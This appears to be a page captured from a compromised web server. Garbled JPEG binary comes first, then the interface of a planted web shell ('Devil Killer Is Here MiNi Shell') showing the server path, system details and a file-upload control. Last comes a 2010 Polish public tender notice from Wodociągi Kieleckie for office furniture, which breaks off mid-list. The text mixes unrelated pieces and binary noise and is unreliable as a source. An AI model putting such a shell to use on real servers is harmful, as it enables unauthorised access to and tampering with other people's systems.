JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101006/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101006/321228-N-2010.html

<p class="kh_header"><b>Kielce: Dostawa  mebli biurowych</b><br>
<b>Numer ogłoszenia: 321228 - 2010; data zamieszczenia: 06.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wodociągi Kieleckie Sp. z o.o. , ul. Krakowska 64, 25-701 Kielce, woj. świętokrzyskie, tel. 041 3653100, faks 041 3455220.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wod-kiel.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  mebli biurowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa mebli biurowych i warsztatowych według poniższego zestawienia:
PAKIET I: 

1.Metalowa dwudrzwiowa szafka ubraniowa z możliwością ustawienia na podstawce z ławką -  30 szt.

a)wymiary [mm] wysokość x szerokość x głębokość:  1800 x 600 x 490;
b)malowana proszkowo - kolor jasny popiel;
c)wieniec dolny z blachy 1 mm, pozostałe elementy szafy z blachy 0,8 mm; 
d)przedziały wyposażone w drążek i wieszaki ubraniowe, haczyk na ręcznik i lusterko;
e)szafka zamykana na klucz z zamkiem ryglującym w trzech punktach

2.Podstawa szafki ubraniowej z ławką -  30 szt.
 
a)  wymiary [mm] szerokość x głębokość x wysokość:  599 x 745 x 405;
b)  stelaż wykonany z profili stalowych, zamkniętych o przekroju czworokątnym 
     - kolor jasny popiel;
c)  siedzisko wykonane z listew plastikowych; 
d) stopki podstaw wyposażone w regulatory wysokości;

Uwagi dotyczące Pakietu I:   

1. Wymiary gabarytowe mebli nie mogą odbiegać od podanych w SIWZ o więcej niż +/- 5 %;

PAKIET II: 

1.Regał magazynowy metalowy, skręcany    -  40 szt.

a)  wymiary [mm] wysokość x szerokość x głębokość:  2000 x 1000 x 600;
b)  malowany proszkowo;
c)  min. 5 szt. półek z możliwością regulacji wysokości; 
d)  nośność półek nie mniejsza niż 150 kg;
e)  elementy złączne ocynkowane.

2.Regał magazynowy metalowy, skręcany    -  20 szt.

a) wymiary [mm] wysokość x szerokość x głębokość:  2000 x 1000 x 500;
b) malowany proszkowo;
c) min. 5 szt. półek z możliwością regulacji wysokości; 
d) nośność półek nie mniejsza niż 150 kg;
e) elementy złączne ocynkowane.

3. Regał magazynowy metalowy, skręcany    -  10 szt.

a) wymiary [mm] wysokość x szerokość x głębokość:  2000 x 1000 x 400;
b) malowany proszkowo;
c) min. 5 szt. półek z możliwością regulacji wysokości; 
d) nośność półek nie mniejsza niż 150 kg;
e) elementy złączne ocynkowane.

Uwagi dotyczące Pakietu II:  

1.Konstrukcja wszystkich regałów w tym samym kolorze.
2.Wymiary gabarytowe regałów nie mogą odbiegać od podanych w SIWZ o więcej niż +/- 5%;

PAKIET III: 
1. Biurko kształtowe -  4 szt. 
a)wymiary  [cm] szerokość x głębokość x wysokość:  160 x 80 x 74;
b)promień wygięcia biurka w granicach 1800 mm - 1900 mm;
c)promień wygięcia osłony biurka dopasowany do wygięcia biurka;
d)osłona dolna biurka z laminatu ozdobnego perforowanego  (otwory 10 x 10 mm 
w odstępach 30 mm)  w kolorze antracytu naklejonego na płytę meblową  
w kolorze mebli;
e)blat grubości min. 28 mm;
f)nogi i łączyny grubości min. 28 mm;
g)łączenie elementów za pomocą złączy minifix i kołków meblowych;
h)biurko musi posiadać aluminiowe stopki z regulacją umożliwiającą poziomowanie.

2.Pomocnik biurkowy (lewy)  -  5 szt. - orientacyjny wygląd - załącznik nr 5.
a)wymiary  [cm] szerokość x głębokość x wysokość:  160 x 42 x 68;
b)podzielony na cztery części: 1 część -odsłonięta - miejsce na jednostkę centralną komputera,  2 część - z półką poziomą osłonięta drzwiczkami żaluzjowymi, 3 część - trzy szufladki 4 część - z boku pomocnika, odsłonięta, zaokrąglona, podzielona na dwie części;
c)prowadnice rolkowe w szufladach;
d)blat grubości min. 22 mm;
e)pozostała konstrukcja grubości min. 18 mm.

3.Pomocnik biurkowy (prawy)  -  3 szt. - orientacyjny wygląd - załącznik nr 5.
a)lustrzane odbicie pomocnika biurkowego lewego.

4.Szafka - komoda    -  4 szt.
a)wymiary  [cm] szerokość x głębokość x wysokość:  80 x 40 x 90;
b)drzwi pełne;
c)wykonana z płyty meblowej o grubości min. 18 mm;
d)tył wykonany z płyty pilśniowej drewnopodobnej;
e)uchwyty przy drzwiach satynowe;
f)łączenie elementów za pomocą  złączy minifix i kołków meblowych;
g)półka wewnątrz z możliwością regulacji wysokości;
h)nóżki regulowane, aluminiowe, malowane na kolor antracyt, wysokość  ok.10 cm;
i)wstawka ozdobna o wysokości ok.50 mm  powyżej wieńca dolnego w kolorze antracyt.
      
5.Fotel biurowy  - 10 szt.
a)mechanizm TILT;
b)wymiary [cm] szerokość x głębokość x wysokość: 61/62/112 - 122 cm 
z tolerancją +/- 3%;
c)materiał - tkanina membranowa / eko-skóra koloru czarnego;
d)wyposażony w podłokietniki;
e)wysokość siedzisk regulowana za pomocą podnośnika pneumatycznego;
f)stelaż - stal chromowana;
g)kółka do powierzchni miękkich.

6.Krzesło konferencyjne    -   14 szt.
a)materiał - tkanina membranowa/siatka koloru czarnego;
b)wymiary [cm] szerokość x głębokość x wysokość: 58x60x97 cm z tolerancją +/- 3%;
c)stelaż - stal chromowana;
d)podłokietniki regulowane ze stali chromowanej i tworzywa czarnego;
e)oparcie profilowane;
f)stopki chroniące powierzchnię podłogi.

7.Kaseta klawiatury mocowana pod blatem biurka       -   8 szt.
a)obrzeże zapobiegające wysunięciu;

8.Szafa aktowo-garderobowa    -  12 szt.
a)wymiary  [cm] szerokość x głębokość x wysokość:  80 x 40 x 196;
b)wykonana z płyty meblowej o grubości min. 18 mm;
c)tył wykonany z płyty pilśniowej drewnopodobnej;
d)uchwyty przy drzwiach satynowe;
e)łączenie elementów za pomocą  złączy minifix i kołków meblowych;
f)półki wewnątrz z możliwością regulacji wysokości;
g)nóżki regulowane, aluminiowe, malowane na kolor antracyt, wysokość ok.10 cm; 
h)wstawki ozdobne o wysokości ok.50 mm  poniżej wieńca górnego i powyżej wieńca dolnego w kolorze antracyt.

9.Regał z drzwiami pełnymi   -   9 szt.
a)wymiary  [cm] szerokość x głębokość x wysokość:  80 x 40 x 196;
b)drzwi pełne, dzielone;
c)góra - 2 półki zamknięte;
d)dół - 1 półka zamknięta;
e)wykonana z płyty meblowej o grubości min. 18 mm;
f)tył wykonany z płyty pilśniowej drewnopodobnej;
g)uchwyty przy drzwiach satynowe;
h)łączenie elementów za pomocą  złączy minifix i kołków meblowych;
i)półki wewnątrz z możliwością regulacji wysokości;
j)nóżki regulowane, aluminiowe, malowane na kolor antracyt, wysokość ok.10 cm;
k)wstawki ozdobne o wysokości ok.50 mm  poniżej wieńca górnego i powyżej wieńca dolnego w kolorze antracyt.

10. Regał    -   8 szt.
a)wymiary  [cm] szerokość x głębokość x wysokość:  80 x 40 x 196;
b)drzwi pełne, dzielone w dolnej części;
c)góra - 2 półki otwarte;
d)dół - 1 półka zamknięta;
e)wykonana z płyty meblowej o grubości min. 18 mm;
f)tył wykonany z płyty pilśniowej drewnopodobnej;
g)uchwyty przy drzwiach satynowe;
h)łączenie elementów za pomocą  złączy minifix i kołków meblowych;
i)półki wewnątrz z możliwością regulacji wysokości;
j)nóżki regulowane, aluminiowe, malowane na kolor antracyt, wysokość ok.10 cm;
k)wstawki ozdobne o wysokości ok.50 mm  poniżej wieńca górnego i powyżej wieńca dolnego w kolorze antracyt.

 11. Stół okrągły    -   1 szt.
a)wymiary  [cm] średnica - 85 , wysokość - 74 ;
b)blat grubości min. 28 mm.

12. Biurko proste    -   5 szt.
a)wymiary  [cm] szerokość x głębokość x wysokość:  140 x 68 x 74;
b)blat grubości min. 28 mm;
c)nogi i łączyny grubości min. 28 mm;
d)łączenie elementów za pomocą złączy minifix i kołków meblowych;
e)biurko musi posiadać aluminiowe stopki z regulacją umożliwiającą poziomowanie.

13. Kontener  na kółkach  -   1 szt.
a)wymiary  [cm] szerokość x głębokość x wysokość:  43 x 50 x 62;
b)blat  grubości min. 22 mm;
c)pozostała konstrukcja grubości min. 18 mm;
d)trzy szuflady zamykane na  zamek centralny;
e)prowadnice rolkowe w szufladach.

14. Dostawka do biurka kształtowego - ? koła   -   3 szt.
a)wymiary  [cm] średnica x wysokość:  100 x 74;
b)blat grubości min. 28 mm;
c)noga z rury ze stali nierdzewnej szczotkowanej;
d)podstawa nogi z płyty w kolorze blatu.

Uwagi do pakietu  III.

1.Meble należy wykonać z płyty wiórowej oklejanej laminatem; płyta musi posiadać atest higieniczny wydany przez uprawniony instytut, musi odpowiadać wymaganiom higienicznym klasy E1;
2.Krawędzie elementów meblowych muszą być oklejone obrzeżem PVC o gr. 1-2 mm, posiadającym atest zgodnie z którym, produkt odpowiada wymaganiom higienicznym w każdych warunkach użytkowania;
3.Użyte kleje nie mogą stanowić zagrożenia dla zdrowia;
4.Wymiary gabarytowe mebli nie mogą odbiegać od podanych w SIWZ o więcej niż +/- 1% za wyjątkiem poz.5 i 6;
5.Płyty użyte do mebli oraz obrzeża muszą być w kolorze grusza jasna, pozostałe elementy w kolorze antracyt.

Gwarancja - minimum 24 miesiące liczone od dnia odbioru mebli..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2, 39.11.20.00-0, 39.11.31.00-8, 39.15.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie przewiduje sie wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnianie tego warunku na podstawie oświadczenia złożonego przez Wykonawcę (oświadczenie według wzoru określonego w załączniku nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnianie tego warunku na podstawie oświadczenia złożonego przez Wykonawcę (oświadczenie według wzoru określonego w załączniku nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnianie tego warunku na podstawie oświadczenia złożonego przez Wykonawcę (oświadczenie według wzoru określonego w załączniku nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnianie tego warunku na podstawie oświadczenia złożonego przez Wykonawcę (oświadczenie według wzoru określonego w załączniku nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnianie tego warunku na podstawie oświadczenia złożonego przez Wykonawcę (oświadczenie według wzoru określonego w załączniku nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku ustawowej zmiany stawki  podatku od towarów i usług - VAT Zamawiający przewiduje możliwość zmiany umowy z zastrzeżeniem, iż oferowana cena netto nie ulegnie zmianie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wod-kiel.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 25-701 Kielce, ul.Krakowska 64  Biuro Obsługi Klienta  Wodociągów Kieleckich.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.10.2010 godzina 10:45, miejsce: 25-701 Kielce, ul.Krakowska 64  Biuro Obsługi Klienta  Wodociągów Kieleckich.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Metalowa dwudrzwiowa szafka ubraniowa z możliwością ustawienia na podstawce z ławką -  30 szt.

a)	wymiary [mm] wysokość x szerokość x głębokość:  1800 x 600 x 490;
b)	malowana proszkowo - kolor jasny popiel;
c)	wieniec dolny z blachy 1 mm, pozostałe elementy szafy z blachy 0,8 mm; 
d)	przedziały wyposażone w drążek i wieszaki ubraniowe, haczyk na ręcznik i lusterko;
e)	szafka zamykana na klucz z zamkiem ryglującym w trzech punktach

2.	Podstawa szafki ubraniowej z ławką -  30 szt.
 
      a)  wymiary [mm] szerokość x głębokość x wysokość:  599 x 745 x 405;
b)  stelaż wykonany z profili stalowych, zamkniętych o przekroju czworokątnym 
     - kolor jasny popiel;
c)  siedzisko wykonane z listew plastikowych; 
d) stopki podstaw wyposażone w regulatory wysokości;

Uwagi dotyczące Pakietu I:   

1. Wymiary gabarytowe mebli nie mogą odbiegać od podanych w SIWZ o więcej niż +/- 5 %;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.15.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Regał magazynowy metalowy, skręcany    -  40 szt.

a)  wymiary [mm] wysokość x szerokość x głębokość:  2000 x 1000 x 600;
b)  malowany proszkowo;
c)  min. 5 szt. półek z możliwością regulacji wysokości; 
d)  nośność półek nie mniejsza niż 150 kg;
e)  elementy złączne ocynkowane.

2.	Regał magazynowy metalowy, skręcany    -  20 szt.

a) wymiary [mm] wysokość x szerokość x głębokość:  2000 x 1000 x 500;
b) malowany proszkowo;
c) min. 5 szt. półek z możliwością regulacji wysokości; 
d) nośność półek nie mniejsza niż 150 kg;
e) elementy złączne ocynkowane.

3.	 Regał magazynowy metalowy, skręcany    -  10 szt.

a) wymiary [mm] wysokość x szerokość x głębokość:  2000 x 1000 x 400;
b) malowany proszkowo;
c) min. 5 szt. półek z możliwością regulacji wysokości; 
d) nośność półek nie mniejsza niż 150 kg;
e) elementy złączne ocynkowane.

Uwagi dotyczące Pakietu II:  

1.	Konstrukcja wszystkich regałów w tym samym kolorze.
2.	Wymiary gabarytowe regałów nie mogą odbiegać od podanych w SIWZ o więcej niż +/- 5%;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.15.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Biurko kształtowe -  4 szt. 
a)	wymiary  [cm] szerokość x głębokość x wysokość:  160 x 80 x 74;
b)	promień wygięcia biurka w granicach 1800 mm - 1900 mm;
c)	promień wygięcia osłony biurka dopasowany do wygięcia biurka;
d)	osłona dolna biurka z laminatu ozdobnego perforowanego  (otwory 10 x 10 mm 
w odstępach 30 mm)  w kolorze antracytu naklejonego na płytę meblową  
w kolorze mebli;
e)	blat grubości min. 28 mm;
f)	nogi i łączyny grubości min. 28 mm;
g)	łączenie elementów za pomocą złączy minifix i kołków meblowych;
h)	biurko musi posiadać aluminiowe stopki z regulacją umożliwiającą poziomowanie.

2.Pomocnik biurkowy (lewy)  -  5 szt. - orientacyjny wygląd - załącznik nr 5.
a)	wymiary  [cm] szerokość x głębokość x wysokość:  160 x 42 x 68;
b)	podzielony na cztery części: 1 część -odsłonięta - miejsce na jednostkę centralną komputera,  2 część - z półką poziomą osłonięta drzwiczkami żaluzjowymi, 3 część - trzy szufladki 4 część - z boku pomocnika, odsłonięta, zaokrąglona, podzielona na dwie części;
c)	prowadnice rolkowe w szufladach;
d)	blat grubości min. 22 mm;
e)	pozostała konstrukcja grubości min. 18 mm.

3.Pomocnik biurkowy (prawy)  -  3 szt. - orientacyjny wygląd - załącznik nr 5.
a)	lustrzane odbicie pomocnika biurkowego lewego.

4.Szafka - komoda    -  4 szt.
a)	wymiary  [cm] szerokość x głębokość x wysokość:  80 x 40 x 90;
b)	drzwi pełne;
c)	wykonana z płyty meblowej o grubości min. 18 mm;
d)	tył wykonany z płyty pilśniowej drewnopodobnej;
e)	uchwyty przy drzwiach satynowe;
f)	łączenie elementów za pomocą  złączy minifix i kołków meblowych;
g)	półka wewnątrz z możliwością regulacji wysokości;
h)	nóżki regulowane, aluminiowe, malowane na kolor antracyt, wysokość  ok.10 cm;
i)	wstawka ozdobna o wysokości ok.50 mm  powyżej wieńca dolnego w kolorze antracyt.
      
       5.Fotel biurowy  - 10 szt.
a)	mechanizm TILT;
b)	wymiary [cm] szerokość x głębokość x wysokość: 61/62/112 - 122 cm 
